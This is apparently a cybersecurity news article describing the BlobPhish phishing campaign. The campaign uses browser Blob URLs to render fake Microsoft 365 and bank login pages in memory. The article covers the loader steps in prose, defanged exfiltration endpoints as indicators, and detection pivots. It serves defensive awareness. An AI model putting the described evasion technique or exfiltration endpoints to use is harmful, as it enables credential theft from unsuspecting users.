Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
AI Used in Ticketmaster Attack to Score Free Tickets
July 3, 2026
Anthropic Details Claude 3.5 Sonnet Safeguards and Jailbreak Framework
July 3, 2026
Google Disrupts NetNut Residential Proxy Botnet Exploiting 2 Million Devices
July 3, 2026
Home/CyberSecurity News/BlobPhish Attack Steals Login Credentials via Browser Blob Objects
CyberSecurity News

BlobPhish Attack Steals Login Credentials via Browser Blob Objects

Key Takeaways A sophisticated phishing campaign, dubbed BlobPhish, has been actively stealing login credentials since October 2024. The attack leverages browser Blob URL APIs to generate phishing...

Sarah simpson
Sarah simpson
April 28, 2026 5 Min Read
39 0

Key Takeaways

  • A sophisticated phishing campaign, dubbed BlobPhish, has been actively stealing login credentials since October 2024.
  • The attack leverages browser Blob URL APIs to generate phishing pages entirely within the victim’s browser, making them virtually invisible to traditional security tools.
  • Microsoft 365 users, major U.S. banks, and various financial platforms are primary targets, with victims spanning multiple sectors globally.
  • The campaign is ongoing and has shown a significant surge in activity in February 2026, indicating a well-maintained and mature threat operation.
  • Mitigation strategies include advanced sandbox analysis, proactive threat hunting, phishing-resistant MFA, and continuous employee training.

Since October 2024, a highly advanced, memory-resident phishing operation known as BlobPhish has been relentlessly compromising user credentials. This campaign specifically targets Microsoft 365 accounts, prominent U.S. banking institutions, and other financial services by exploiting browser Blob URL APIs. A critical aspect of BlobPhish’s success is its remarkable ability to evade detection by conventional security measures.

Table Of Content

  • Key Takeaways
  • BlobPhish Kill Chain
  • BlobPhish Evades Conventional Defenses
  • Key Indicators of Compromise (IOCs)
  • What You Should Do

BlobPhish represents a significant evolution in credential-phishing tactics, fundamentally altering the method by which malicious login pages are delivered to unsuspecting victims.

Unlike traditional phishing attacks that host fake login pages on attacker-controlled web servers and serve them via standard HTTP, BlobPhish generates its phishing pages entirely within the victim’s browser using JavaScript Blob objects. This innovative approach results in a phishing payload that exists solely in memory, leaving no discernible forensic artifacts such as disk files, cache entries, or suspicious HTTP requests in proxy logs for security tools to flag.

Blobphish attack detonated in the sandbox

The campaign, first identified in October 2024, has persisted without interruption for over 18 months. A notable increase in activity was observed in February 2026, underscoring its status as a mature and continuously developed threat rather than a fleeting opportunistic assault.

BlobPhish Kill Chain

The BlobPhish kill chain is ingeniously designed to circumvent both network-based and file-based security defenses:

  • Initial Access: Victims typically receive a phishing email, often disguised as a financial notification, invoice, or document-sharing alert. These emails contain links to seemingly trustworthy services like DocSend or shortened URLs from platforms such as t.co. Additionally, PDF attachments embedded with QR codes leading to malicious JavaScript pages have been observed, particularly targeting the energy sector.
  • Loader Execution: Clicking the malicious link redirects the victim to an attacker-controlled HTML page hosting a JavaScript loader. This loader, utilizing jQuery, covertly creates a hidden <a> anchor element. It then Base64-decodes a bundled phishing payload using atob(), constructs a Blob object of type text/html, generates a blob:https:// URL via window.URL.createObjectURL(), and finally forces the browser to navigate to this URL. All these actions occur without any visible user interaction.
Code responsible for blob object download
  • Evidence Destruction: Immediately after the browser navigates to the Blob URL, the loader executes window.URL.revokeObjectURL() and removes the anchor element from the Document Object Model (DOM). This action effectively eliminates any remaining in-memory traces of the loader’s operation.
Code responsible for blob object download
  • Credential Harvest: The victim is then presented with a highly convincing replica of a login page for services such as Microsoft 365, Chase, Capital One, or other financial platforms. The browser’s address bar displays a blob:https:// URL, which can easily appear legitimate to an unsuspecting user. A built-in failed-login counter often prompts victims to re-enter their credentials multiple times, enhancing the accuracy of harvested data. Captured credentials are exfiltrated via HTTP POST requests to attacker-controlled endpoints, typically matching patterns like */res.php, */tele.php, or */panel.php. These endpoints are predominantly hosted on compromised legitimate WordPress sites.
Data exfiltration patterns

BlobPhish Evades Conventional Defenses

BlobPhish targets an extensive range of high-value platforms, including Microsoft 365, OneDrive, SharePoint, Chase, Capital One, FDIC, E*TRADE, Charles Schwab, Morgan Stanley/Merrill Lynch, American Express, PayPal, and Intuit.

Phishing form imitating Chase Banking login page

While financial and cloud productivity lures are dominant, the victim organizations span diverse sectors, including Finance, Manufacturing, Education, Government, Transportation, and Telecommunications.

Geographically, approximately one-third of the observed victims are based in the United States, with additional activity noted across Germany, Poland, Spain, Switzerland, the UK, Australia, South Korea, Saudi Arabia, Qatar, Jordan, India, and Pakistan.

The campaign’s primary innovation for evasion lies in its use of the blob:https:// scheme. Since the phishing page is never transmitted over the network as a standalone HTTP response, it bypasses numerous security mechanisms:

  • URL reputation engines are ineffective because there is no external URL for them to scan.
  • Proxy logs show no suspicious requests related to the phishing page itself.
  • Secure Email Gateways (SEGs) miss the payload, as it materializes only after email delivery.
  • File-based endpoint solutions find nothing, as no file is ever written to disk.
  • Cache forensics yield no results, as the Blob URL is revoked before investigators can inspect it.

A single successful BlobPhish compromise can lead to severe consequences, including Business Email Compromise (BEC) fraud, complete Microsoft 365 tenant takeover, unauthorized wire transfers, manipulation of investment accounts, and even ransomware deployment following lateral movement within a network.

Beyond operational damage, organizations face significant legal exposure due to regulatory requirements such as GDPR’s 72-hour breach notification, SEC cybersecurity incident disclosure, and FFIEC authentication guidance.

Key Indicators of Compromise (IOCs)

IOC Type Example
Loader URL hxxps[://]mtl-logistics[.]com/blb/blob[.]html
Exfiltration endpoint hxxps[://]mtl-logistics[.]com/css/sharethepoint/point/res[.]php
Capital One exfil hxxps[://]wajah4dslot[.]com/wp-includes/certificates/tmp//res[.]php
Chase Banking exfil hxxps[://]hnint[.]net/cgi-bin/peacemind//res[.]php
E*TRADE exfil hxxps[://]ftpbd[.]net/wp-content/plugins/cgi-/trade/trade//res[.]php
tele.php variant hxxps[://]_wildcard_[.]gonzalezlawnandlandscaping[.]com/…/tele[.]php

Additional compromised domains identified include larva888[.]com, riobeautybrazil[.]com, i-seotools[.]com, and mts-egy[.]net.

What You Should Do

To defend against sophisticated attacks like BlobPhish, security teams must implement a multi-layered defense strategy focused on dynamic analysis and user education:

  • Deploy Advanced Sandbox Analysis: Utilize sandbox environments capable of executing JavaScript within real browsers to safely detonate blob-based payloads before they reach end-users.
  • Proactive Threat Hunting: Actively hunt for BlobPhish activity using the BlobPhishLoaderHTML YARA rule and pivot queries (e.g., url:"/res.php$", url:"*/blob.html$") within threat intelligence platforms.
  • Enforce Phishing-Resistant MFA: Implement and enforce phishing-resistant Multi-Factor Authentication (MFA), such as FIDO2/hardware keys, on all critical platforms like Microsoft 365 and banking portals to significantly reduce the impact of successful credential compromise.
  • Integrate Live Threat Intelligence: Automate the integration of real-time threat intelligence feeds that push BlobPhish Indicators of Compromise (IOCs) directly into firewalls, proxies, and SIEM rules to rapidly adapt defenses as attacker infrastructure evolves.
  • Conduct Regular Employee Training: Educate employees to recognize the unique red flag of unexpected blob:https:// URLs in their browser address bars, fostering a culture of vigilance against novel phishing techniques.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackBreachCybersecurityExploitphishingransomwareSecurityThreat

Share Article

Sarah simpson

Sarah simpson

Sarah is a cybersecurity journalist specializing in threat intelligence and malware analysis. With over 8 years of experience covering APT groups, zero-day exploits, and advanced persistent threats, Sarah brings deep technical expertise to breaking cybersecurity news. Previously, she worked as a security researcher at leading threat intelligence firms, where she analyzed malware samples and tracked cybercriminal operations. Sarah holds a Master's degree in Computer Science with a focus on cybersecurity and is a regular contributor to major security conferences.

Previous Post

Microsoft Confirms Remote Desktop Warnings May Display Incorrectly After April 2026 Security Update

Next Post

Critical RCE in GitHub.com and Enterprise Server Lets Attackers Fully Compromise Servers

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
New Microsoft 365 Phishing Uses OAuth Device Code Flow to Steal Tokens
July 2, 2026
Critical Claude Cowork Sandbox Vulnerability Lets Attackers Run Commands as Root
July 2, 2026
Ousaban Malware Targets Iberian Banks with Phishing PDFs and VBS Downloader
July 2, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us